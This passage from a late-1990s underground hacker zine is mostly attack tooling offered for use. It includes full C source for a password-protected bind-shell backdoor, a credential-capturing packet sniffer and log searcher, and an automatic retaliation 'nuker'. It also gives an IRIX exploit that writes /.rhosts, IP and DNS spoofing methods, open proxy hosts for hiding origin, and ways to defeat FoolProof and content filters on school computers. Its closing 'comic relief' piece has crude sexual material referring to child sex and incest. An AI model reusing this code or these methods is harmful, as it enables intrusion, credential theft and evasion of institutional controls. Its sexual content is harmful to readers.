Wingate: " you then enter the location you wan't to bounce to. If using the wingate method to test your systems logging it is good to bounce from more then one wingate at a time. Using Wingate as a socks host on IRC: Linux use (from ircii or BitchX, etc.): /server :23 /quote :6667 Windows use: Enter wingate location in your irc client's "FIREWALL/SOCKS HOST" query. [Some Wingates For your Proxy Pleasure] ns2.thesocket.com formfill.com 207.96.173.116 207.96.173.109 207.96.173.119 207.96.173.144 (14)-----------SECURITY-------------------------------------------(14) [backdoor.c]---------------------------------------------------| jsbach | /* backdoor.c by jsbach@bear.cs.zorg.edu. That dup2() shit was ripped from pluvius@io.org. Compiles fine on *BSD*, Linux, and Solaris (on Solaris -lsocket) to hide the process i strcpy("", argv[count]);, making it invisible on Solaris and pretty inconspicuous on BSD and Linux. Basically, this binds a program to a specified port and listens for a connection. When you exit the program, you DON'T get dropped to a shell, so you can let people bounce telnet connections off your box but not access anything else, or whatever. Example usage: ./backdoor /bin/sh 31337 p@55w0rd & or ./backdoor /bin/sh 31337 */ #define DATA "Hello. Please place semicolons after commands in shell mode :P\n---\n" #include #include #include #include int sockfd, count, clientpid, socklen, serverpid, temp, temp2,temp3; struct sockaddr_in server_address; struct sockaddr_in client_address; main(int argc, int **argv) { char password[ sizeof( argv[3] ) ]; char passwordchk[ sizeof( argv[3] ) ]; count=0; if (argc < 3) { printf("usage: %s program_to_run port_number password(optional)\n",argv[0]); exit(-1); } if (argc == 4) { strcpy((char *)&password, argv[3]); strcpy((char *)argv[3], ""); } printf("\n-----\nDaemon running %s on port %d. PID is %d.\n-----\n",argv[1], atoi(argv[2]), getpid()); sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); /*add error checking*/ bzero((char *) &server_address, sizeof(server_address)); strcpy((char *)argv[0],""); server_address.sin_family=AF_INET; server_address.sin_port=htons(atoi(argv[2])); strcpy((char *)argv[2],""); server_address.sin_addr.s_addr=htonl(INADDR_ANY); bind(sockfd, (struct sockaddr *)&server_address, sizeof(server_address)); listen(sockfd, 5); signal(SIGHUP, SIG_IGN); while(1) { socklen=sizeof(client_address); temp=accept(sockfd, (struct sockaddr *)&client_address,&socklen); if(argc == 4) { while(1) { write(temp, "Password: ", 10); read(temp, &passwordchk, sizeof(password)); if(strncmp(passwordchk, password, sizeof(password)) == 0) break; bzero(passwordchk,sizeof(passwordchk)); } } write(temp, DATA, sizeof(DATA)); if (temp < 0) exit(0); clientpid=getpid(); serverpid=fork(); if (serverpid != 0) { dup2(temp,0); dup2(temp,1); dup2(temp,2); execl(argv[1],argv[1],(char *)0); } close(temp); } } (15)-----------SECURITY-------------------------------------------(15) [IP Spoofing]-----------------------------------------------| optiklenz | GENERAL: - System A tries to open a connection to System B. System B accepts the connection (or not) and sends back a response; the connection gets established and interacted. - Requires trust between A and B. SOURCE-ROUTE: - System A wants to 'fake' one of your system's addresses to talk with System B (the address to be 'faked' is assumed to be trusted to B). The exact same thing happens as above, except the first- hop gateway from System A has been set up to route YOUR netmask to System A and System A has been set up with the trusted address on your net. The other is that System A is 'source routing' (LSR if distant) to your net with the first-hop's address in the route, so when System B answers its buddy, the trusted system, the packets are actually going to System A's first-hop and getting routed to System A. The fix is to disallow source- routing of course. - Requires control of first-hop routing from System A and that System B's net allows source-routing. SPOOF (DNS spoofing) - System A finds r* programs on System B and modifies the reverse DNS entries for System A to look like a system that B trusts. System A connects to System B, B looks up the DNS entry and gets back a host that B trusts. Easy, ugly. Fix is tcp-wrappers or replace r*'s. - Requires control of reverse DNS tables with System A's address and the default/stupid r* command daemons on System B. SPOOF (DNS spoofing with cache poison) - As above but System A 'volunteers' an IP address in an MX record to System B's DNS cache so that if tcp-wrappers are running the second lookup and compare with also succeed. SPOOF (IP level 'blind' spoofing): - System A shuts down the trusted host on your network via quirks in the implementations of TCP/IP (or waits for it to go down or whatever). System A sends a non-source-routed connect packet to System B using the trusted hosts's network address, just like the trusted host would have done if it were initiating a connection. System B sends out the response to its buddy and it stays on the local subnet (why would it have any desire to leave ?). System A never gets the response, but the seq# guessing code doesn't care, it just guesses the next seq# in the chain of packets that System B would expect and pretends it has an open connection (which to System B it does, but System A has no way of really knowing that- thus, it (System A) is acting 'blind'). The point of the exercise is to send System B something that gives System A some kind of access/feedback. The fix: don't allow external packets into your network that have internal addresses. - Requires System B's net to allow external packets with internal addresses. GAINING TRUST RELATIONSHIP One fashion of accomplishing this would be setting up a circumstantial ralationship between System A and System B. In the main directory of System A create a .rhosts file: echo B uid > ~/.rhosts, and the same on System B. Same method goes for SCO Unix: if you rlogin as root to a system via a trusted host (one which is in the /etc/hosts.equiv), a passwd is not required. VHOST vs SPOOFING I've seen various people on irc who believe that because they are irc'ing with a vhost, they are spoofed. That is definitly not the case. A Vhost (Virtual Host) is merely the ability for a machine to be a web server for multiple domains. vhost ie: advisory.legions.org <--[vhost] (16)-----------SECURITY-------------------------------------------(16) [Anal Sniff]--------------------------------------------------| chron1c | /* Program Title: : Anal Sniffer v.01 Author : chron1c Date : 19 April 1998 Sytem : Linux -- Tested on Slackware v3.x,Red Hat v4.x, OpenLinux 1.x, and OpenBSD v2.x Web Page : http://www.legions.org/chronic/ Contacts : chronic@legions.org Affiliation : Legions Of the Underground http://www.legions.org Description : Anal Sniffer v.01 is a program used to monitor TCP/IP packets. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define ERR stderr char *malloc(); char *device, *ProgName, *LogName; FILE *LOG; int debug=0; #define NIT_DEV "/dev/nit" #define CHUNKSIZE 4096 /* Device buffer size. */ int if_fd = -1; int Packet[CHUNKSIZE+32]; void Pexit(err,msg) int err; char *msg; { perror(msg); exit(err); } void Zexit(err,msg) int err; char *msg; { fprintf(ERR,msg); exit(err); } #define IP ((struct ip *)Packet) #define IPD (ip->ip_dst) #define IPeq(s,t) ((s).s_addr == (t).s_addr) #define IP_OFFSET (0x1FFF) #define IPHLEN (ip->ip_hl) #define IPLEN (ntohs(ip->ip_len)) #define IPS (ip->ip_src) #define SZETH (sizeof(struct ether_header)) #define TCPD (tcph->th_dport) #define TCPS (tcph->th_sport) #define TCPOFF (tcph->th_off) #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) #define MAXBUFLEN (1000) time_t LastTIME = 0; struct CREC { struct CREC *Next, *Last; time_t Time; struct in_addr SRCip, DSTip; u_int SRCport, /* src/dst ports */ DSTport; u_char Data[MAXBUFLEN+2]; u_int Length; u_int PKcnt; u_long LASTseq; }; struct CREC *CLroot = NULL; char *Symaddr(ip) register struct in_addr ip; { register struct hostent *he = gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); return( (he)?(he->h_name):(inet_ntoa(ip)) ); } char *TCPflags(flgs) register u_char flgs; { static char iobuf[8]; #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') SFL(0,TH_FIN, 'F'); SFL(1,TH_SYN, 'S'); SFL(2,TH_RST, 'R'); SFL(3,TH_PUSH,'P'); SFL(4,TH_ACK, 'A'); SFL(5,TH_URG, 'U'); iobuf[6]=0; return(iobuf); } char *SERVp(port) register u_int port; { static char buf[10]; register char *p; switch(port) { case IPPORT_LOGINSERVER: p="rlogin"; break; case IPPORT_TELNET: p="telnet"; break; case IPPORT_SMTP: p="smtp"; break; case IPPORT_FTP: p="ftp"; break; default: sprintf(buf,"%u",port); p=buf; break; } return(p); } char *Ptm(t) register time_t *t; { register char *p = ctime(t); p[strlen(p)-6]=0; /* strip " YYYY\n" */ return(p); } char *NOWtm() { time_t tm; time(&tm); return( Ptm(&tm) ); } #define MAX(a,b) (((a)>(b))?(a):(b)) #define MIN(a,b) (((a)<(b))?(a):(b)) /* add an item */ #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ register struct CREC *CLtmp = \ (struct CREC *)malloc(siz_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN)) { ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */ void death() { register struct CREC *CLe; while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); } /* opens network interface, performs ioctls and reads from it, * passing data to filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len; if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit initialization code pinched from etherfind */ { struct strioctl si; struct ifreq ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open"); if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)"); si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)𝔦 if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char *)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl (I_FLUSH)"); } while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp = buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp; register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp += sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp->nhb_msglen); } } Pexit((-1),"Eth: read"); } /* Yo Authorize your proogie,generate your own password and uncomment here */ /* #define AUTHPASSWD "EloiZgZejWyms" void getauth() { char *buf,*getpass(),*crypt(); char pwd[21],prmpt[81]; strcpy(pwd,AUTHPASSWD); sprintf(prmpt,"(%s)UP? ",ProgName); buf=getpass(prmpt); if(strcmp(pwd,crypt(buf,pwd))) exit(1); } */ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf ifc; int s, ac=1, backg=0; ProgName=argv[0]; /* getauth(); */ LOG=NULL; device=NULL; while((acifr_name; } fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n"); if(!LOG) LOG=stdout; signal(SIGINT, death); signal(SIGTERM,death); signal(SIGKILL,death); signal(SIGQUIT,death); if(backg && debug) { fprintf(ERR,"[Cannot bg with debug on]\n"); backg=0; } if(backg) { register int s; if((s=fork())>0) { fprintf(ERR,"[pid %d]\n",s); exit(0); } else if(s<0) Pexit(1,"fork"); if( (s=open("/dev/tty",O_RDWR))>0 ) { ioctl(s,TIOCNOTTY,(char *)NULL); close(s); } } fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); fflush(LOG); do_it(); } (17)-----------SECURITY-------------------------------------------(17) [Back Attack]---------------------------------------------------| chrak | /* compile: cc nukeback.c -o nukeback -Wall let it run like a shell script that nukes them back or something run on port 1 to stop portscanners quickly written by chrak */ #include #include #include #include #include #include #include void main(int argc, char **argv) { int s_sock,c_sock,i; struct sockaddr_in s_info, c_info; char comline[66], *nuker; if(argc != 3) { printf("usage: %s port nuker\n", argv[0]); exit(EXIT_FAILURE); } s_sock = socket(AF_INET, SOCK_STREAM, 0); s_info.sin_family = AF_INET; s_info.sin_addr.s_addr = htonl(INADDR_ANY); s_info.sin_port = htons(atoi(argv[1])); bind(s_sock, (struct sockaddr *)&s_info, sizeof(s_info)); i = sizeof(c_info); listen(s_sock, 1); for(;;) { for(i=0;i<66;i++) comline[i] = '\0'; i = sizeof(c_info); c_sock = accept(s_sock, (struct sockaddr *)&c_info, &i); send(c_sock, "bleh?\n", 6, 0); close(c_sock); nuker = inet_ntoa(c_info.sin_addr); printf("Connect from %s\n", nuker); sprintf(comline, "%s %s", argv[2], nuker); printf("Doing %s\n", comline); system(comline); printf("Waiting for next bitch...\n"); } } (18)-----------SECURITY-------------------------------------------(18) [IRIX LMR]--------------------------------------------------| optiklenz | This is found to affect Irix 5.3, but is also vulnerable on 6.1, and 6.2. This exploits license_eoe.sw.license_eoe. Note: LicenseManager is GUI used to license subsystem. This allows you to install, update, and remove FLEXlm and NET_LS licenses. Any user with access to an X screen would be able to run it. $ setenv netls_lincense_file /.rhosts $ /usr/etc/LicenseManager (19)-----------SECURITY-------------------------------------------(19) [Securing Linux]----------------------------------------------| BlackIC | This will explain some basic security measures you can take after installing a Linux system. This is based on a slackware install, but the information should be good for other distributions also. First off, before you do anything you need to goto /etc/inetd.conf and take out all the services you don't need; for now comment them all out by adding a # in front of the line. If you plan to use telnet and ftp read the later chapter on securing those services. Now for changes to take effect type ps, get the pid of inetd and type kill -HUP . Next you will want to goto /etc/rc.d/rc.inet2 and comment out the following lines: # Start the SUN RPC Portmapper. #if [ -f ${NET}/rpc.portmap ]; then # echo -n " portmap" # ${NET}/rpc.portmap #fi # # Start the various SUN RPC servers. if [ -f ${NET}/rpc.portmap ]; then # Start the NFS server daemons. if [ -f ${NET}/rpc.mountd ]; then echo -n " mountd" ${NET}/rpc.mountd Now if you plan on having users on your systems I recommend getting sshd installed for a more secure shell, you can read about and download it at http://www.cs.hut.fi/ssh. Also make sure you have the most current kernel (which of the time of this writing is 2.0.33), I also recomend getting the Rhino9 Linux Security Auditer Tool availible at rhino9.org; it will check for suid programs and other possible security holes. Also if you are gonna give out shells make sure you trust these people. Update your passwords at least once a month or more and make sure there good passwords; not like "god", "password1", "dog", etc. Some examples of good ones are "x3toyC34j8gg2"; if your reading this that means you probably have a newer distribution so it already has shadow passwords built in, i wouldn't recommend trying to install them if you don't, due to the fact I have seen a few people have big probs because of it. This guide was not meant to insure your security in any way, just because new exploits come out all the time, so keep yourself updated at cert.org or rootshell.com. Also as a final note, your system will never be 100% secure, as no system is, so like um don't blame me if you get fucked over. (20)-----------SECURITY-------------------------------------------(20) [FoolProof]---------------------------------------------| Duncan Silver | In's and Out's of FoolProof Control (not so FoolProof After All) I thought long and relatively hard about what my article is going to be about. Instead of bombarding you with yet another "l33t" article on vulnerabilities and things that have been written about over and over, I decided to bring you something new, and while it may not be as glamorous as some of the other topics I could have chosen, at least it is completelly new, and unknown (to the best of my knowledge). Hope you find it useful. - Duncan Silver -------------------------- What is Foolproof Control: FoolProof Control is a security program manufactured by SmartStuff Software, designed for Windows 3.1, Windows95, and MacOS. The purpose of this program is to restrict access to certain programs and devices (for example, the default setup locks out access to hard drive, any preferences, options, etc.). This program is quite useful (and widely used) in public institutions like schools and libraries. FoolProof is basically a simple TSR (terminate and stay resident) program, executed at the startup time (yes, in some cases it can be bypassed by ctrl+break during startup). The restricted access features are considered locked by the computer, and are simply not available. To unlock the restricted features, you need to enter the password. ---------------------------- A Word on FoolProof Passwords: FoolProof priviledged users are divided into two categories: the users with access to all features, and users with access to FoolProof configuration itself. This simply means that there are two means of authorization, the first being clicking on the foolproof icon and entering the password (minimum of six characters) which gives you access to the FoolProof configuration, and the second method being the hotkey. Now, I found hotkey feature to be quite interesting. You see, hotkey is set of four keys which need to be pressed at the same time. When this occurs, FoolProof is removed from the memory, enabeling all the features. You are free to do as you please, however you are still unable to configure FoolProof or change the hotkey. After messing around with it for a long time (and installing some key loggers) I found that the hotkey always constitutes of CTRL+SHFT+two alphabet characters. I'm not sure if this is only how they do it at the place where I tested it, or if this is a requirement. ----------------------------- Now that we have an idea of what it is, and what it does, we can move into the interesting part: defeating it. ----------------------------- Preamble: I spent quite some time messing around with FoolProof control, and I have discovered a major flaw affecting all the versions released so far. I wrote to SmartStuff explaining this problem, and about a month later I received mail from them stating that they have been "unable to reproduce the problem." It's quite obvious that their response is B.S, since I have exploited this vulnerability on several different sites. ---------------------------- Windows 95 + 3.1 DA FLAW: This is quite funny actually, but while messing around on one of these FoolProof protected machines, I came upon a wonderous idea. In the location window I entered: c:\. Needless to say the "protected" contents of the hardrive appeared before me. I am now able to execute any binary file simply by clicking on it. However, I wanted more, I wanted to disable this FoolProof joke for good. It turns out that if you try to open autoexec, netscape will execute it, which does you no good. The way around this is to right click on the autoexec.bat file and then chose edit. Contents of autoexec are displayed in NotePad, and after removing any references to FoolProof, do the same thing with config.sys. After saving both files, simply reboot. WHY oh WHY does this work? Well for the technical part of it, FoolProof restricts access to USERS, and when I typed c:\ in the Netscape location window, the machine saw me as NETSCAPE instead of an USER. Same thing with saving autoexec.bat and config.sys to the drive, the foolproof thinks that netscape is trying to save these files, and since Netscape is a program, it has any right to do whatever da fuck it wants to do. Pretty simple eh? ------------------------ Macintosh: Well, what can I say? I was never much of a Macintosh fan. Somebody went ahead of me in writing an article on defeating FoolProof for Macintosh, so the full credit for this section goes to tristan_durie@starbase.ca. 1. One way to disable FoolProof is to hold down the space bar when boot up the computer. The Extensions Manager will then appear and you can then turn off the FoolProof Extension (You can also just hold down the Shift key when you start up. This will turn of the Extensions. This only works when the admin of the computer has set up FoolProof so that it doesn't ask for a password to access the hard drive so using the shift key doesn't usually work). 2. Drag a folder (other than the Extensions Folder) onto the Launcher and it will then make an alias in the Launcher Items folder. You can then drag the FoolProof extension onto the alias of the folder on the Launcher. This will move the FoolProof Extension into the folder. Restart the computer and the FoolProof Extension will no longer be in the Extensions Folder and FoolProof will be disabled. (This methood is also useful for moving files around the hard drive when FoolProof disables dragging.) 3. Create a AppleScript program with a script like this: tell application "Finder" activate choose file copy the result to File1 choose folder copy the result to Folder1 move File1 to Folder1 end tell Run this script and choose the FoolProof Extension and then choose a folder other than the Extensions folder. Restart the computer and FoolProof should be disabled. 4. Run DropStuff and stuff the FoolProof Extension being sure to click the "delete file after stuffing" check box. Press OK and restart the computer after it has finished stuffing. The FoolProof Extension will be compressed so it won't work (The original FoolProof extension was deleted because you checked the "delete file after stuffing" check box). 5. If the Get Info command is disabled and you want to unlock something or change the memory allocation search for the file that you want to change using the FindFile. You can get info on files in window of FindFile. This is fairly useful for unlock the FoolProof Control Panel, preference or the FoolProof Extension because they lock every time you restart or open the FoolProof Control Panel. You can also use this method to replace the FoolProof extension, Control Panel or Preferences because you can't replace them if they are locked (The older version of FoolProof allows you to move files into the Trash and other folders using the FindFile). 6. If you can run programs from a disk it is very simple to disable FoolProof. Make a program that deletes the FoolProof extension or you could use ResEdit to delete all the resources from the FoolProof Extension and restart. 7. All of the settings for the FoolProof options are stored in the FoolProof preferences. You can change the settings by switching the preferences file with the one I have provided with this stack. Unfortunatly, the password is already set to one that I don't know but password protection is disabled. All the settings are disabled when you install this preference file. 8. If you can't run programs of disks but you can use documents you can create a Hypercard stack using hypercard externals that will delete the FoolProof Extension. You can then run this stack using Hypercard Player on the protected computer. ------------------------ One more stupid trick: Another stupid trick the "FoolProof Administrators" like to do is to disable only certain menus of the applications. Let me give you an example: after deciding that we cannot have students running wherever they please on the Internet, the administration bought membership to some gay-assed proxy server named Bess which restricts access to anything that could even remotely be considered fun (no, I'm not talking about porn, you sick0's). Well, normally, we would start Netscape, go to Options Menu select Network Preferences (or Edit->Preferences in Communicator), and turn off the proxies and go about our business. FoolProof allowed admins to disable the options menu. To bypass this idiocy, simply go to Netscape Mail, notice how a new window opens, containing all the menus including Options. Many times admins forget to disable these menus (well, actually all the time ;). So, that's another thing you might want to try. ------------------------- What FoolProof makers say about their product: "FoolProof Security, the most advanced version of the desktop security licensed on over one million school computers, is the market leader. FoolProof Security first began provide protection of systems and hard drives in 1993. The current version provides work groups with distinct privileges, including where users can save documents, program access, including internet programs and control of software downloaded from the internet." What I say about their product: "haha" -------------------------- Conclusion: In conclusion, FoolProof is an expensive piece of software that's definitely not worth it. It's a piece of crap, and very easily defeated. If you are administrator planning to implement some security on Dos or Windows machines I recommend Fortress software. (21)-----------MISC-----------------------------------------------(21) - { = - = M I S C = - = } - [56kpnp Linux]-------------------------------------------------| mosoka | This Linux HOWTO examines the basic ways to setup your 56k compatible modem under the Linux operating system, how to get isapnptools to find and configure your modem correctly and also how to set other setting that are critical in your modem installation process. 1: Introduction The aim of this document, basically as stated above is to get your 56k modem to work in Linux. Modem installation under Linux in most cases aren't very complicated but its the new technology introduced with Windows 95 that has complicated matters. Such modems like Winmodems and modems that get configured using the Plug and Play method are the problem. Linux, currently has no Plug and Play support but their are some ways to get around it and hopefully by the end of this document everything will be working normally if not better then before. 2: Setting Up 2.1: What Modem Do You Have The first part of the solution is to become knowlegable with your modem and who makes its, model numbers, etc. Some things that you should look out for are the following models: Winmodems and other modems that use Windows caching methods. If you have one of these models, stop reading this document and try and get your money back. Winmodems, as of yet, are uncompatible with Linux because of their methods of caching and setup. After you have found your model name and numbers you should take a visit to the homepage or bbs of your Linux distrubution company. In my case, I use OpenLinux so I would visit www.caldera.com. Most Linux companies have a list of compatible and uncompatible hardware for their distrubutions and thats what your looking for. The simplest method to finding this would be to search the site for your modem model and if it comes up as a hit under compatible hardware, your in luck. If by chance it come up in uncompatible hardware, you still may be able to get it working but it will take some time and a lot of work. If you were unable to find a compatible/uncompatible hardware list its alright, it isn't really important but you should still try and contact your Linux distrubution company by other means and try to find out if its compatible or not. 2.2: Doing Some Research The next part of setting up your modem is raid as many newsgroups and support archives you can to get a backround on your modem. You will be surprised at how many people are in the same situation as yourself. When I was tring to figure out how to configure my modem, I met some guy who was in the same situation and did try to offer some help but it didn't work probably due to the differences in our operating systems. A good place to check for your modem model is to go to www.metacrawler.com and search throughout the newsgroups selection for your modem model. If you don't get that many hits searching the newsgroups you can all try "Linux and " in the web search option. If your modem is not Plug and Play, skip down to Configuring Your Modem In Linux. 2.3: Downloading Files Alright, now that you know your modem you should be able to determine weather or not is Plug And Play or not. Now a days, most internal modems are Plug and Play and you will need to download a program called isapnptools in order to configure them. Isapnptools is the leading and currently the only Plug and Play configuration tool for the Linux operating system. It can be found at www.roestock.demon.co.uk/isapnptools. At the time of this document, the latest version 1.13 and is available in many formats from tar gzip to rpm. Basically, thats the only file you will need. 2..4: Configuring Isapnptools Isapnptools comes with a tool called pnpdump which will scan your system for your Plug and Play device and find all the different ways it can be configured. Now is a good time to get out some paper and copy down some configurations cause you will need to write a config file next. From the information from pnpdump, you now must make a file called isapnp.conf. Basically, the stuff that you saw on your screen when your ran pnpdump and copied down on paper you will just need to put it in this file, so pick the best setup for your system that doesn't conflict with any other devices and start typing in your isapnp.conf file. For an example, here is my isapnp.conf file so you can see what i'm talking about: (READPORT 0x3bb) (ISOLATE) (IDENTIFY *) (CONFIGURE MOT1550/90238999 (LD 0 (IO 0 (BASE 0x3e8)) (INT 0 (IRQ 7 (MODE +E))) (ACT Y))) (WAITFORKEY) If your having trouble and don't understand you can formulate a config file from my example. First you can copy and paste the first 3 lines and put them into your file. This will make a list of the Plug and Play devices you have installed. At this point, save your isapnp.conf file and run it. It will tell you the device name and serial numbers of the devices when you load up isapnp with your isapnp.conf file. Copy the device name and serial number off your screen and paste them into your isapnp.conf file in this format: (CONFIGURE (LD 0 In the next line, you need to decide what port you want to put your modem in. You should pick a port that obviously doesn't have anything in it or is configured in your Linux. In my example, I'm using port com 3 which in hex is 0x3e8. If you want to use a different port, just change the hex address after the command "BASE". Lastly, you need to configure what irq your modem will use. In my example, I'm using irq 7. If you want to use a different one, like with the port address, just change the number after the command "IRQ". The last two lines of the config file are manditory and you should just copy and paste them in. Next, you need setup a program called setserial. To do this you should make a file called "modem" in your isapnptools directory and have it consist of the following: isapnp isapnp.conf setserial /dev/ttyS autoconfig setserial /dev/ttyS means that you should take the com port number where your modem is in and subtract one from it. For example, my modem is com 3 so I would use: "/dev/ttyS2". Save your "modem" file and make it executable by typing in: "chmod +x modem" and lastly, run it. Now that your Plug and Play device is configured, you need to configure Linux to the settings you just set to your modem. 2.5: Configuring Your Modem In Linux If you modem Plug and Play, you already set it up to a com port and irq address but if its not, you need to open your computer up and set it up using dip switches or jumpers but if you already set them for Windows then you don't need to reset them. Next thing you need to do if your modem is Plug and Play or not, is go to your Linux setup program. For example, the Linux setup program in OpenLinux is Lisa and in Slackware, it's setup. In the setup program, configure Linux to the settings you set using isapnptools or the settings you set using your jumpers or dip switches. 3: Finished At Last 3.1: Thats It, Your Done Alright, Congratulations. You have now setup your modem in Linux. To use it, just use the device name of /dev/tty in communication programs like minicom or in ppp dialing scripts. I hope this faq was able to answer all your questions you had about setting up your 56k modem in Linux and reached the goal of getting it to work. (22)-----------MISC-----------------------------------------------(22) [Sniff Log]-----------------------------------------------------| chrak | /* sniffer log searcher, for quickly checking a sniffer log to see if there's any new entries in it, by chrak */ #include #include #include #include void main(int argc, char **argv) { int i, type = 0 , o = 0; /*type -t 1,-f 2,-tf 3,-r 4,-tr 5,-rf 6,-trf 7*/ char c[80], ignore[30]; FILE *fp1, *fp2; if(argc == 1) { printf("%s -l log -tfr -o out\n-l solsniffer log to open\n" "-t get telnets\n-f get ftps\n-r get rlogins\n-o out file" " - else stdout\n-i ignore string - ignores output with" " given string\n", argv[0]); exit(EXIT_FAILURE); } while((i = getopt(argc, argv, "l:o:i:tfr")) != -1) { switch(i) { case 'l' : printf("input: %s\n", optarg); if((fp1 = fopen(optarg, "r")) == NULL) { printf("Cant open file %s\n",optarg); exit(EXIT_FAILURE); } break; case 'o' : printf("output: %s\n", optarg); fp2 = fopen(optarg, "a"); o = 1; break; case 't' : printf("telnet\n"); type = 1+type; break; case 'f' : printf("ftp\n"); type = 2+type; break; case 'r' : printf("rlogin\n"); type = 4+type; break; case 'i' : printf("ignore: %s\n", optarg); strcpy(ignore, optarg); break; } } for(;;) { if((fgets(c, 80, fp1) == NULL)) break; if(strstr(c, ignore) == NULL) { if(type == 1 || type == 3 || type == 5 || type == 7) if(strstr(c,"(telnet)") != NULL) { if(o==1) fprintf(fp2, "%s", c); else printf("%s", c); } if(type == 2 || type == 3 || type == 6 || type == 7) if(strstr(c,"(ftp)") != NULL) { if(o==1) fprintf(fp2, "%s", c); else printf("%s", c); } if(type == 4 || type == 5 || type == 6 || type == 7) if(strstr(c,"(rlogin)") != NULL) { if(o==1) fprintf(fp2, "%s", c); else printf("%s", c); } } } fclose(fp1); if(o==1) fclose(fp2); } (23)-----------COMIC RELIEF---------------------------------------(23) - { = - = C O M I C R E L I E F = - = } - With guest editor, Analyzer [Young Hackers, and Jail]------------------------------------| Ana1yzer | Greetings from the fighting grounds of Israel. I am your guest editor for this month. Let me start off by introducing myself to those of you who have failed to notice my L33tness. I am Analyzer, and was born in Mymomsucksyouall israel. My nickname comes from many generations of seksi anal seks0rs. My mother died when I was 14 from an anal concussion I never thought that my little prick would end up killing her. Anyway after her death I was in shock so I started hanging on the net alot. And having sibor seks on irc in #young_child_sex where I felt welcome. Just when things were going ok, my goat humpry was bombed by the Israel military. I lubbed humpfry he was my only friend in the whole wide world after his death I took my anger out on the government not for killing a friend, but for killing a lover. Well enough about my gay, and boring life. This all started when me, and a couple of friends got together to hax0r the goberment cause they wer fuckin un elite and shit and they killed humpfry so I was pissed you know? Ok so me Juan Carlos, and Don Mexicano got together a family of over 100 immirgrants, and rented out a warehouse for our elite operation. Once things were set, and we taught the immirgrants our elite ways we started hacking away. The method I used is very complex and hard. Here it is: ./statd url.gov Holy shit?!! you say?!? You'll never get it you say?!? Well don't worry it took me months to figure it out and im fucken mad elite and shit Really it's nothing special we just sat there feeding gobernment url's to a list and then we gained root. I guess the gobernment is pretty fucken dumb because it took them 2 months to figure out how to use the tekniq 2 more days than it took me. Our attack was called the most systematic attack eber (th4tz c4us3 w3 c4n typ3 a1l el8, 4n FuNky) and because "statd" is what you call "anonymous"... Jail is really a bad bad thing I neber would eber go again. My first bad experience in jail was with what you Americans call "soap." One day I was rubbin and scrubbin, and OOPSIE! The soap dropped so I bent down to pick it up, and for no reason my ass started moving back and forth and my hips side to side. I thought to myself "hrmmm," and kept looking for the soap the feeling really didn't bug me at all I kinda liked it. Once I found the soap I stood, and heard a suction type sound coming from my ass it was funny, but my asshole wasn't hurting anymore so it really didn't bug me. Then all of a sudden I was approached from behind. I guess in American network security you would call what happens next an "outside attack." I was forced to the ground, and then anal seks0red... After my shower I was assigned a cell block with my new cellmate Bubba. It was there where I was forced to perform oral sex "again." My dad had already taught me this method you Americans call "giving head." In fact, I still have my dads teef marks on the tip of my pee pee, every day I look at it to remember the good times dad, and I had (those were the days). The morale of this story is that well if you go to jail you get screwed look. The extreme close ups of my anus below: ANAL SHOTS: (_|_) (_o_) BEFORE JAIL AFTER JAIL ============================================================================= || Download Legions Text Files, and Zines at the following Boards: || ============================================================================= || Under The Influence...........(ALM)OST-HERE.............World HQ....... || || Narkotik Illusions............(303)PRI-VATE.............Midwestern HQ.. || || Exodus BBS....................(707)935-6867.............Distro Site.... || || Electric Rush (NuP)...........(707)257-7208.............Distro Site.... || 